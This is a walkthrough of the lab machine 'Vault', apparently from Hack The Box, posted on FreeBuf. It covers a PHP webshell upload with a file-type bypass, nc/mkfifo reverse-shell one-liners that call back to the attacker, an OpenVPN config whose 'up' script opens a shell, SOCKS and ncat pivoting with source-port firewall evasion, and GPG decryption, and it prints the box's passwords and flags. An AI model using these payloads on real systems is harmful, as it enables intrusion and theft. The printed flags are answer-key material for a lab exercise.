收藏

历史
投稿

[Meachines] [Medium] Vault OpenVPN RCE+NC代理横向移动+GPG解密

FreeBuf.COM 2025-04-24 11:30:34
收藏

Information Gathering

IP AddressOpening Ports
10.10.10.109TCP:22,80

$ ip='10.10.10.109'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a69d0f7d7375bba8940ab7e3fe1f24f4 (RSA)
|   256 2c7c34eb3aeb0403ac48285409743d27 (ECDSA)
|_  256 98425fad8722926d72e6666c82c10983 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Upload Webshell

http://10.10.10.109/

image.png

页面中提到了Sparklays

$ feroxbuster -u 'http://10.10.10.109/sparklays' -x php

image-1.png

http://10.10.10.109/sparklays/design/changelogo.php

image-2.png

image-3.png

POST /sparklays/design/changelogo.php HTTP/1.1
Host: 10.10.10.109
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.109
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyY59DQNIHLMl1e0R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.109/sparklays/design/changelogo.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="file"; filename="1.php5"
Content-Type: application/gif

GTF89A
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f');?>
------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="submit"

upload file
------WebKitFormBoundaryyY59DQNIHLMl1e0R--

$ curl -S http://10.10.10.109/sparklays/design/uploads/1.php5

image-4.png

Dave

$ cat /home/dave/Desktop/*

image-5.png

password:Dav3therav3123
key>itscominghome

image-6.png

Dave to DNS server && OpenVPN RCE

image-8.png

$ ssh -D 1090 [email protected]

$ time for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done

image-9.png

BP代理到1090

http://192.168.122.4/

image-10.png

image-11.png

https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/

remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind

image-12.png

$ cat /home/dave/ssh

image-21.png

dav3gerous567

User.txt

a4947faa8d4e1f80771d34234bd88c73

Privilege Escalation && NC Proxy lateral movement && gpg decrypt

$ cat /home/alex/.bash_history

image-15.png

$ grep -rHa "192.168.5.2" /var/log

image-17.png

$ nmap 192.168.5.2 -Pn -f

image-16.png

$ nmap 192.168.5.2 -Pn -f --source-port=4444

image-18.png

使用本地解析

$ nc 192.168.5.2 987 -p 53

image-19.png

使用NC搭建隧道

在本地监听1801端口代理。DNS服务器数据转发到192.168.5.2的987端口,并且使用本地端口53

DNS$ SHELL=/bin/sh script -q /dev/null

DNS$ /usr/bin/ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53" &

DNS$ ssh dave@localhost -p 1801 -t 'bash'

dav3gerous567

image-20.png

image-22.png

image-23.png

$ base32 -w0 root.txt.gpg

QUBAYA6HPDDBBUPLD4BQCEAAUCMOVUY2GZXH4SL5RXIOQQYVMY4TAUFOZE64YFASXVITKTD56JHDLIHBLW3OQMKSHQDUTH3R6QKT3MUYPL32DYMUVFHTWRVO5Q3YLSY2R4K3RUOYE5YKCP2PAX7S7OJBGMJKKZNW6AVN6WGQNV5FISANQDCYJI656WFAQCIIHXCQCTJXBEBHNHGQIMTF4UAQZXICNPCRCT55AUMRZJEQ2KSYK7C3MIIH7Z7MTYOXRBOHHG2XMUDFPUTD5UXFYGCWKJVOGGBJK56OPHE25OKUQCRGVEVINLLC3PZEIAF6KSLVSOLKZ5DWWU34FH36HGPRFSWRIJPRGS4TJOQC3ZSWTXYPORPUFWEHEDOEOPWHH42565HTDUZ6DPJUIX243DQ45HFPLMYTTUW4UVGBWZ4IVV33LYYIB32QO3ONOHPN5HRCYYFECKYNUVSGMHZINOAPEIDO7RXRVBKMHASOS6WH5KOP2XIV4EGBJGM4E6ZSHXIWSG6EM6ODQHRWOAB3AGSLQ5ZHJBPDQ6LQ2PVUMJPWD2N32FSVCEAXP737LZ56TTDJNZN6J6OWZRTP6PBOERHXMQ3ZMYJIUWQF5GXGYOYAZ3MCF75KFJTQAU7D6FFWDBVQQJYQR6FNCH3M3Z5B4MXV7B3ZW4NX5UHZJ5STMCTDZY6SPTKQT6G5VTCG6UWOMK3RYKMPA2YTPKVWVNMTC62Q4E6CZWQAPBFU7NM652O2DROUUPLSHYDZ6SZSO72GCDMASI2X3NGDCGRTHQSD5NVYENRSEJBBCWAZTVO33IIRZ5RLTBVR7R4LKKIBZOVUSW36G37M6PD5EZABOBCHNOQL2HV27MMSK3TSQJ4462INFAB6OS7XCSMBONZZ26EZJTC5P42BGMXHE27464GCANQCRUWO5MEZEFU2KVDHUZRMJ6ABNAEEVIH4SS65JXTGKYLE7ED4C3UV66ALCMC767DKJTBKTTAX3UIRVNBQMYRI7XY=

dave@ubuntu$ gpg -d root.gpg

itscominghome

image-24.png

Root.txt

ca468370b91d1f5906e31093d9bfe819

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
原始链接: https://www.freebuf.com/articles/web/428362.html
侵权请联系站方: [email protected]

相关推荐

换一批